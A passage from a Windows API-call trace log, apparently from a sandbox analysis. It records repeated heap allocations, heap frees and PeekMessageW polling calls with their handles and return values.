[0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0134.570] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0134.570] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0134.571] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0134.571] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0134.572] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0134.572] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0134.572] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0134.572] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0134.573] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0134.573] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0134.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0134.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.574] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0134.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 